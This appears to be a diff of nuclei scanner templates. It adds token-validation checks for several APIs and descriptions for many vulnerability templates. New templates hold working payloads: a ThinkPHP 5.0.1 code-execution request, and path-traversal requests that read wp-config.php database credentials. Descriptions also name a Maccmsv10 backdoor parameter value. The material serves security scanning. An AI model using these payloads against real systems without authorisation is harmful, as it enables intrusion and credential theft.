info:
name: LeanIX API Test
author: dwisiswant0
severity: info
reference: https://docs.leanix.net/docs/rest-api
tags: token-spray,leanix
self-contained: true
requests:
- method: GET
path:
- "https://us.leanix.net/services/integration-api/v1/examples/starterExample"
- "https://eu.leanix.net/services/integration-api/v1/examples/starterExample"
headers:
Authorization: Bearer {{token}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "Credentials are required"
negative: true

23
token-spray/api-strava.yaml Normal file
View File

@ -0,0 +1,23 @@
id: api-strava
info:
name: Strava API Test
author: dwisiswant0
reference: https://developers.strava.com/docs/getting-started/
severity: info
tags: token-spray,strava
self-contained: true
requests:
- method: GET
path:
- "https://www.strava.com/api/v3/athlete"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "Authorization Error"
negative: true

23
token-spray/api-taiga.yaml Normal file
View File

@ -0,0 +1,23 @@
id: api-taiga
info:
name: Taiga API Test
author: dwisiswant0
reference: https://docs.taiga.io/api.html
severity: info
tags: token-spray,taiga
self-contained: true
requests:
- method: GET
path:
- "https://api.taiga.io/api/v1/application-tokens"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "token_not_valid"
negative: true

22
token-spray/api-thecatapi.yaml Normal file
View File

@ -0,0 +1,22 @@
id: api-thecatapi
info:
name: TheCatApi API Test
author: daffainfo
severity: info
reference: https://docs.thecatapi.com/
tags: token-spray,thecatapi
self-contained: true
requests:
- method: GET
path:
- "https://api.thecatapi.com/v1/votes"
headers:
x-api-key: "{{token}}"
matchers:
- type: status
negative: true
status:
- 401

23
token-spray/api-webex.yaml Normal file
View File

@ -0,0 +1,23 @@
id: api-webex
info:
name: Cisco Webex API Test
author: dwisiswant0
severity: info
reference: https://developer.webex.com/docs/getting-started
tags: token-spray,cisco,webex
self-contained: true
requests:
- method: GET
path:
- "https://webexapis.com/v1/rooms"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "errors"
negative: true

1
vulnerabilities/other/WooYun-2015-148227.yaml
View File

@ -3,6 +3,7 @@ info:
name: Seeyon WooYun LFR
author: princechaddha
severity: high
description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker.
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
tags: seeyon,wooyun,lfi

1
vulnerabilities/other/maccmsv10-backdoor.yaml
View File

@ -3,6 +3,7 @@ info:
name: Maccmsv10 Backdoor
author: princechaddha
severity: critical
description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'.
tags: maccmsv10,rce
requests:

1
vulnerabilities/other/metinfo-lfi.yaml
View File

@ -4,6 +4,7 @@ info:
author: pikpikcu
severity: high
reference: https://paper.seebug.org/676/
description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content.
tags: metinfo,lfi
requests:

1
vulnerabilities/other/opensns-rce.yaml
View File

@ -4,6 +4,7 @@ info:
name: OpenSNS Remote Code Execution Vulnerability
author: gy741
severity: critical
description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.
reference:
- http://www.0dayhack.net/index.php/2417/
- https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E

1
vulnerabilities/other/php-zerodium-backdoor-rce.yaml
View File

@ -3,6 +3,7 @@ id: php-zerodium-backdoor-rce
info:
name: PHP Zerodium Backdoor RCE
author: dhiyaneshDk
description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
reference: https://news-web.php.net/php.internals/113838
severity: critical
tags: php,backdoor

1
vulnerabilities/other/processmaker-lfi.yaml
View File

@ -4,6 +4,7 @@ info:
name: ProcessMaker <= 3.5.4 Directory Traversal
author: KrE80r
severity: high
description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content.
reference:
- https://www.exploit-db.com/exploits/50229
- https://www.processmaker.com

1
vulnerabilities/other/rconfig-rce.yaml
View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
tags: rconfig,rce
description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- https://www.exploit-db.com/exploits/48878

1
vulnerabilities/other/rockmongo-xss.yaml
View File

@ -4,6 +4,7 @@ info:
name: RockMongo V1.1.8 XSS
author: pikpikcu
severity: medium
description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application.
reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
tags: rockmongo,xss

3
vulnerabilities/other/ruijie-eg-rce.yaml
View File

@ -4,8 +4,9 @@ info:
name: Ruijie EG cli.php RCE
author: pikpikcu
severity: critical
description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://www.ruijienetworks.com
tags: ruijie,rce

1
vulnerabilities/other/ruijie-networks-lfi.yaml
View File

@ -4,6 +4,7 @@ info:
name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
author: pikpikcu
severity: high
description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
reference: https://exploit-db.com/exploits/48755
tags: ruijie,lfi

1
vulnerabilities/other/sangfor-edr-rce.yaml
View File

@ -4,6 +4,7 @@ info:
name: Sangfor EDR 3.2.17R1/3.2.21 RCE
author: pikpikcu
severity: critical
description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands.
reference: https://www.cnblogs.com/0day-li/p/13650452.html
tags: rce

1
vulnerabilities/other/sap-redirect.yaml
View File

@ -4,6 +4,7 @@ info:
name: SAP wide open redirect
author: Gal Nagli
severity: medium
description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice.
tags: redirect,sap

1
vulnerabilities/other/seacms-rce.yaml
View File

@ -3,6 +3,7 @@ info:
name: SeaCMS V6.4.5 RCE
author: pikpikcu
severity: high
description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
tags: seacms,rce

2
vulnerabilities/other/solar-log-authbypass.yaml
View File

@ -4,7 +4,7 @@ info:
name: Solar-Log 500 2.8.2 - Incorrect Access Control
author: geeknik
severity: high
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
reference: https://www.exploit-db.com/exploits/49986
tags: solarlog,auth-bypass

1
vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
View File

@ -4,6 +4,7 @@ info:
name: Sonicwall SSLVPN ShellShock RCE
author: PR3R00T
severity: critical
description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
reference:
- https://twitter.com/chybeta/status/1353974652540882944
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

1
vulnerabilities/other/turbocrm-xss.yaml
View File

@ -4,6 +4,7 @@ info:
name: TurboCRM XSS
author: pikpikcu
severity: medium
description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application.
reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
tags: xss,turbocrm

1
vulnerabilities/other/twig-php-ssti.yaml
View File

@ -4,6 +4,7 @@ info:
name: Twig PHP <2.4.4 template engine - SSTI
author: madrobot
severity: high
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
tags: php,ssti
requests:

1
vulnerabilities/other/ueditor-file-upload.yaml
View File

@ -3,6 +3,7 @@ info:
name: UEditor Arbitrary File Upload
author: princechaddha
severity: high
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
reference:
- https://zhuanlan.zhihu.com/p/85265552
- https://www.freebuf.com/vuls/181814.html

1
vulnerabilities/other/unauth-hoteldruid-panel.yaml
View File

@ -3,6 +3,7 @@ info:
name: Unauthenticated Hoteldruid Panel
author: princechaddha
severity: high
description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication.
reference: https://www.hoteldruid.com/
tags: hoteldruid,panel,unauth

1
vulnerabilities/other/unauth-spark-api.yaml
View File

@ -3,6 +3,7 @@ info:
name: Unauthenticated Spark REST API
author: princechaddha
severity: medium
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
reference: https://xz.aliyun.com/t/2490
tags: spark,unauth

1
vulnerabilities/other/viewlinc-crlf-injection.yaml
View File

@ -4,6 +4,7 @@ info:
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
author: geeknik
severity: low
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
tags: crlf,viewlinc

1
vulnerabilities/other/vpms-auth-bypass.yaml
View File

@ -4,6 +4,7 @@ info:
name: Vehicle Parking Management System 1.0 - Authentication Bypass
author: dwisiswant0
severity: high
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
reference: https://www.exploit-db.com/exploits/48877
tags: auth-bypass
requests:

1
vulnerabilities/other/webui-rce.yaml
View File

@ -3,6 +3,7 @@ info:
name: WebUI 1.5b6 RCE
author: pikpikcu
severity: critical
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
reference: https://www.exploit-db.com/exploits/36821
tags: webui,rce

2
vulnerabilities/other/wems-manager-xss.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
tags: xss
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
reference:
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html

1
vulnerabilities/other/yapi-rce.yaml
View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: critical
tags: yapi,rce
description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
reference:
- https://www.secpulse.com/archives/162502.html
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b

1
vulnerabilities/other/yarn-resourcemanager-rce.yaml
View File

@ -5,6 +5,7 @@ info:
author: pdteam
severity: low
tags: apache,rce
description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code.
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
requests:

3
vulnerabilities/other/zhiyuan-file-upload.yaml
View File

@ -1,9 +1,10 @@
id: zhiyuan-file-upload
info:
name: Zhiyuan Oa arbitrary file upload vulnerability
name: Zhiyuan OA arbitrary file upload vulnerability
author: gy741
severity: critical
description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed.
reference: https://www.programmersought.com/article/92658169875/
tags: zhiyuan,rce

3
vulnerabilities/other/zhiyuan-oa-session-leak.yaml
View File

@ -1,9 +1,10 @@
id: zhiyuan-oa-session-leak
info:
name: Zhiyuan Oa Session Leak
name: Zhiyuan OA Session Leak
author: pikpikcu
severity: medium
description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
reference: https://www.zhihuifly.com/t/topic/3345
tags: zhiyuan,leak,disclosure

1
vulnerabilities/other/zimbra-preauth-ssrf.yaml
View File

@ -4,6 +4,7 @@ info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
reference:
- https://www.adminxe.com/2183.html
tags: zimbra,ssrf,oast

1
vulnerabilities/other/zms-auth-bypass.yaml
View File

@ -4,6 +4,7 @@ info:
name: Zoo Management System 1.0 - Authentication Bypass
author: dwisiswant0
severity: high
description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability.
reference: https://www.exploit-db.com/exploits/48880
tags: auth-bypass,zms

27
vulnerabilities/thinkphp/thinkphp-501-rce.yaml Normal file
View File

@ -0,0 +1,27 @@
id: thinkphp-501-rce
info:
name: ThinkPHP 5.0.1 RCE
author: lark-lab
severity: critical
tags: thinkphp,rce
requests:
- method: POST
path:
- "{{BaseURL}}/?s=index/index/index"
body: "s=phpinfo()&_method=__construct&filter=assert"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200

1
vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
View File

@ -4,6 +4,7 @@ info:
name: SMTP WP Plugin Directory listing enabled
author: PR3R00T
severity: high
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: wordpress,wp-plugin

1
vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
View File

@ -4,6 +4,7 @@ info:
name: WordPress Attitude Themes 1.1.1 Open Redirection
author: 0x_Akoko
severity: low
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020030183
tags: wordpress,wp-theme,redirect

1
vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
View File

@ -4,6 +4,7 @@ info:
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
author: 0x_Akoko
severity: low
description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020040103
tags: wordpress,wp-plugin,redirect

1
vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
View File

@ -3,6 +3,7 @@ info:
name: WordPress accessible wp-config
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
severity: high
description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
tags: wordpress,backup
requests:

29
vulnerabilities/wordpress/wp-javospot-lfi.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-javospot-lfi
info:
name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
reference:
- https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
- https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
- https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
tags: wordpress,wp-theme,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

1
vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
View File

@ -4,6 +4,7 @@ info:
name: WordPress Oxygen-Theme Themes LFI
author: 0x_Akoko
severity: high
description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
tags: wordpress,wp-theme,lfi
reference: https://cxsecurity.com/issue/WLB-2019030178

29
vulnerabilities/wordpress/wp-tinymce-lfi.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-tinymce-lfi
info:
name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
author: 0x_Akoko
severity: high
description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
reference:
- https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
- http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
tags: wordpress,wp-theme,lfi,wordpress,tinymce
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

2
vulnerabilities/wordpress/wp-upload-data.yaml
View File

@ -4,7 +4,7 @@ info:
name: wordpress-upload-data
author: pussycat0x
severity: medium
description: Searches for Passwords in the wordpress uploads directory.
description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
reference: https://www.exploit-db.com/ghdb/7040
tags: wordpress,listing

2
vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
View File

@ -4,7 +4,7 @@ info:
name: Woocommerce PDF Invoice Exposure
author: mohammedsaneem,sec_hawk
severity: medium
description: Allows attacker to view sensitive information such as company invoices
description: A vulnerability in Woocommerce allows remote unauthenticated attackers to access company invoices and other sensitive information.
reference:
- https://twitter.com/sec_hawk/status/1426984595094913025?s=21
- https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml

8
vulnerabilities/wordpress/wptouch-open-redirect.yaml
View File

@ -4,6 +4,14 @@ info:
name: WPTouch Switch Desktop 3.x Open Redirection
author: 0x_Akoko
severity: medium
description: |
WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible.
reference: https://cxsecurity.com/issue/WLB-2020030114
tags: wp-plugin,redirect,wordpress

12
workflows/hikvision-workflow.yaml Normal file
View File

@ -0,0 +1,12 @@
id: hikvision-workflow
info:
name: Hikvision Security Checks
author: pdteam
description: A simple workflow that runs all Hikvision related nuclei templates on a given target.
workflows:
- template: technologies/hikvision-detection.yaml
subtemplates:
- template: cves/2021/CVE-2021-36260.yaml